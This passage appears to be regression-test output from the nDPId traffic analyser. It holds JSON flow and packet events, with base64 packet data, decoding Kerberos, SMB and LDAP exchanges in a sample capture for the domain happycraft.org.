Jkc3DH"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931218,"flow_last_seen":1549337931218,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337931218,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1549337931218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337931218,"pkt":"pB9ywglqAAgCHEeuCABFAACxAI5AAIAGkMesEAjJrBAICMAXAFhuRvAsCoQzw1AYAQDQpAAAiAqFUHJzV5J+NXZTIhoIU8GbmBSxYcQbV4PW+ckPMTgFBw0KsYU9otlYXn6Tyj5\/BmOv8b2TCLvhZTzW6Z3PoLeUqFO88\/fWi+AgP8mYvV1NNCnNorn77cmRI2eXkDk7qLKlgMm4cUN+eWFUE7G2Z1e9ZdF2LM4CSirBRuN96IFr6Z0blZRnqpw="}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337931219,"pkt":"AAgCHEeupB9ywglqCABFAACbE31AAIAGfe6sEAgIrBAIyQBYwBcKhDl3bkbwtVAYAQD\/bQAAzmwvcX+5XppDtJZXr9PwDYLsp98Hk08TTktA1oPPxQHxyFPFFH6C9d30u8d8saioSDapQyKHHyGt004ct60erCJP9bUby12IBGHwYva7Ha2y2bxZxEn3nV+8BQON\/a2dluoxZFHPI4urPpSWS9H8dnzG6Q=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337931219,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/AJNAAIAGi7SsEAjJrBAICMAYAFg1TYdzLuLg4VAYAQBQtwAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjoWrS7jR3\/ZxrmkklAr5M\/UVPgZBz\/I0MBRDSrLAPTWRtuq1ZhbBTvDmh4JfIoeW\/NN+j\/BIs99fVl1IARv5kJzlvsrT0oz2PdU+R8Rl10wOzwJfT7yBOJecNjJCW1XhiL9p6LojffFaim+4jvn\/X89SbhRBqPbpCCF+yHmow+h4iZkD+HM6Jz3YsaIdiuQwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44s3moBTADAgES"}
00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337931220,"pkt":"AAgCHEeupB9ywglqCABFAAXME4FAAIAGeLmsEAgIrBAIyQBYwBgu4uDhNU2NClAYAQBUPQAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9aIPBwtNxkshczHziSeGRCcSiSC82vdTNNxZoZEqctTILmi\/cPiWo2kj2ZowTM5BfoTzgngU5zy1dblxSYtNNDo790fqKeln68pSwduOA5ekfZ2omIpLyTKi1Uzi5unXScqqLz0hKSsn\/40+2FcuWZE3ZvPuCmZ8SKPEnuc921KBrNqOj\/0DryAdSyI8er0AkE463j84WxyAtyNQDKDrp2ez6929oR6Rx5hbvL8GdKQY9jCLD2rnICMW89Hj9rOupV1OeH78XxxB7MSKm499oGFFneF9SM8YJwXSSMV673PLXubFj6DMrikD2G0Sl6xic8MhWvEbY+QDRNnfGPZAJvMaahqCk8wVuJCt+fkFop+b4toNRK\/McSX15qS4Oue1FamxPlWb8yeZyA7zxXMdyv\/9YdFl51KW6DMdV\/gNQhWVbNsnpHVbk+dZ3hmZuA13vS+pCaVgYWcY8TsTrrqDHUdvkhYH5y6bQXhaba0hTe8Bpqjtkm6\/RTu4J\/\/NKiUQMb9AOVNXKtDTvIFCVxCzbgDhWofcnihAdfiq3GVUSfoJVIjvbiKN6rurAhxZ5G7eeGZ0k0F7hodA7NNCDg1db\/i3Z0nn0sEe0z7aNhzE0ribx16c5Vcg7SzYKcbmYr2SOlrqyDG2wBIue4c+yHf8w4ERFzFfLLBAoUF6TY9mRoNRbKB\/qSAwbDd52vGpnn87rIVg\/QNGVIwMeb1KKPfdaC4wum+6\/FhZgWd0DbrZEhIXl\/8HN6zG+3ywmGFdeC2DFCmO4dETOrfkL6fl3T\/7ku0etROu1j+k26SXEG6Gge01yPUKju51MrjdtHnDZ1Ss42MB0XlUT6U6S5TlEIP\/8k9d0krm1cn0oRERln+NBIaJS\/B2711LZddv4tje7ItSqfXLacjoI7g80JWdXjf4l7SPcZiNeEbp1dMmXrQFZcbRN17kosEr4Tm2W4friYde8+zbAKqoXvVJXbnxAUwEVAGcV\/iPptIl\/xW9mtB0WPhDmkKXm2SfL9rih8OBbowoKkOmIJqQw8CRJRncVK0szyJok+ajlBHDiJgpcZUT8EmfmEr0qJ0qoMeuCqxs8Kf3IstAtgMR7lMBZda98WMq0J06Prxf9X\/7Sw5XHFF0Ihx2VyWiVN3DmzgADoDdivNlyaD8+Octjfvk+ZwiZGCsRMD1d7AL6HjQzrju4nysDHJIjeaKR52nWtCWAZ87qog1mDH+qjQPdMGkDr1FGrVbBXAZcR0K17tOKTw9bgQg9LvLMWeDMDNCEwvA8GHdr\/fAsBPK3PDKVyht8oNdhjar8xKOZRvwzCOpoIBJjCCASKgAwIBEqKCARkEggEVYp6jTcDi\/gYVd9SDuEsi2VccBape1lXgcuGoeWG1ePxV5NidfJvDEi3F2VmdD04JFUaFb\/GRqNe9F8xWyy86xiJ3eKyJgAfyG7DDQnnFCeKC++4ORaBUkKnIeWwsFqQxh0aL1BrdknGP8u06G6P95r9esj7jUPDXQ1D0+jbs1WpWssKqZMQfUgV0eg9FoEGdVPsUmgNbZN2YPPrxhZ6CEgNOIC\/5aj8NqGMkPPX6xfYF4tbD74dZ3EfC4ry5KcIxNVYXU179as2C\/cihpEMrX8yiZtM91awDzQYUMPKt3\/3WSS96ycQo00pex7Pc1Jh3j49Cr5ckyWXD9SUXbCcOpUpip4\/Jz5Hvsliozjm5inKwUIBTJQ=="}
00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931220,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337931220,"pkt":"pB9ywglqAAgCHEeuCABFAAELAJhAAIAGkGOsEAjJrBAICMAWAb2ZMOb++YgxIFAYAP+McAAAQFskZ7b1ZYO5\/CuVOTe3ZqHs3nhqe1KXhnlBtJ\/qDgyo+sduQpC\/WLkmAdUvTJdV+CtGiwLoGf3Uio50ZE6gilnFEbzLLhzMIw4gwhRvlYwapNctw4G2EkpKfWO1MgMQ0yTGVxtfwAuP0ouYkDi\/6FI97AzDGvp\/R2LK19PAI403fVWk1Cbb2O\/YPOGH5a8hHowuR6tT8UugHDdGGl\/fWl8Wk4rCdi\/3gOYAhRVI6o2ZOHpv4GeBlLgJ6L2WL35O3jhh2e2dr0Fkd\/WG3ET2QLw9x3WRfncFn29f8nOqAUQDRH0="}
00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337931221,"pkt":"AAgCHEeupB9ywglqCABFAAEsE4VAAIAGfVWsEAgIrBAIyQG9wBb5iDEgmTDn4VAYAP9zWgAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABdAAAAAAQAAPvWvNgjH\/I48OPxOa5H7a4JAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUswX\/mwh6g2ztwHi8\/dTRtvFzo0LVENq7tttT0JwVpKoIxijjsysss5HuCbI3DQGU7C0ILmrl+8phtVtu+2vBMSA9FKWe75R\/a+ST6oEaoDrDjzWfPqdU4xUCgD\/zK6J0O4Dsk+rO8nhy4LUmk="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937690,"flow_last_seen":1549337937690,"flow_idle_time":7440000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937690,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1549337937690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937690,"pkt":"pB9ywglqAAgCHEeuCABFAAEyAM1AAIAGkAesEAjJrBAICMAbAYXq\/lHZFzDO61AYAQB3VwAADK3yhyWG\/w4ePjAcLdmQD9l5KJpA6NxzQuCtaFM+te5CWXRB5sUkdKJyUVp4kqyFJvIav1zvlLEwv\/M6QDvIyPip6cO\/Y7DDZ55OmD6IlKO8Nx5lANmfdaxcK4l74ZAlM45v2cQu8OV3yuWKq5L2jtnHunCltg9I9Mqjq93VmxUc7poK8vfSfY1YgBhAmlp0cXMsoyIbcEQodelj3wLBZ2oxItwV78GGNt7TlfW6joQ5wfkj6ZEyRFJn0CVihbNqYYKxBD44uauIJQKkPsQlzXsxooh9lhiWoZtuh5F2\/1LO7drek9zYg6pqUFpyhpL3WcFxh3R7Uuv9RQ5CYfOoVItdeOxn2w53bU0="}
00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937691,"pkt":"AAgCHEeupB9ywglqCABFAAD6E5tAAIAGfXGsEAgIrBAIyQGFwBsXMM7r6v5S41AYAQDOWAAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1JH5VWFTlwrbTZZZgbjZtW4QY+VaIr2rFT9\/AbDkv31Idx3xo24Bwzqv50t5zQXx7Id1H\/iLYt+nRqN0NWzCDJwnAfwcbOTGF30f3qnaqB+vDQ9EhQX38cpSy926C3lIc0Vkhc+VaaHdh510+B"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937700,"flow_last_seen":1549337937700,"flow_idle_time":7440000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937700,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1549337937700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937700,"pkt":"pB9ywglqAAgCHEeuCABFAAEyANVAAIAGj\/+sEAjJrBAICMAcAYWCU2zwSN6TcFAYAQDS2QAAEgduSF05n8MFVjy4LWbkIsui7POF\/jI0fgAi3\/kn4+lZJrv4uo1Xj0IHKshBaLfyrICuzZtbBAFYjLvQz7y8gyRTfkwzadmnUFntTq1Eam1s4n2Qhfn1fuSUa5DAR1i941DEujmYu8fTZX3tp1hllqkxXisHcqSEIi8W9weLGXgpYEZYoErMkYejHKEeDmPCwQO6JC7sDmP8cAErQb7Rc88wLF4lFI7xOIE4FiH\/05afA1w9V5d1P2yDaGB6bADs\/c2xi7QKQuP+FixF4gof0ovK0nwq\/y7Hd27V4SQ4qHRNlXJex92QoEPhio00QFq1bLTnuvdcqFYcMu\/6\/tRVEcFKp0ezr7WF5MI="}
00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937701,"pkt":"AAgCHEeupB9ywglqCABFAAD6E6JAAIAGfWqsEAgIrBAIyQGFwBxI3pNwglNt+lAYAQCvQgAAMIQAAADMAgEKYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG2EupGhqTVA+Kxm5vIdkbfFjlPoe8DmjpF\/p2I3j7EwFjqQzavz5jy+cGzZKn09a9y0dyj\/mpeHcqpjjORB3KYfxKGHrDmiKKSYiCwqx86ee7rLKiQPX2z3RSwNa4fWz8uAjgw+I5CkXYbP6rNu"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337937703,"pkt":"pB9ywglqAAgCHEeuCABFAAEXANlAAIAGkBasEAjJrBAICMAdAFjHhcaiuhdcXlAYAQCv5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBFIcW1KoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="}
00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337937703,"pkt":"AAgCHEeupB9ywglqCABFAAE+E6VAAIAGfSOsEAgIrBAIyQBYwB26F1xex4XHkVAYAQDp0AAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg1NlqlBQIDBJWNpgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="}
00731{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337937724,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAN1AAIAGj8KsEAjJrBAICMAeAFgo\/29go\/Vk0VAYAQAVQgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4EwWkoanvLUiVA5eu8uG72\/EPy4+eHAiK9HbftleuqZ7DwBR\/wY3Sc5USTXPr6SJXdlLH8zfIE5MwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLSk9ITlNPTi1QQySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEUhxbUqgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
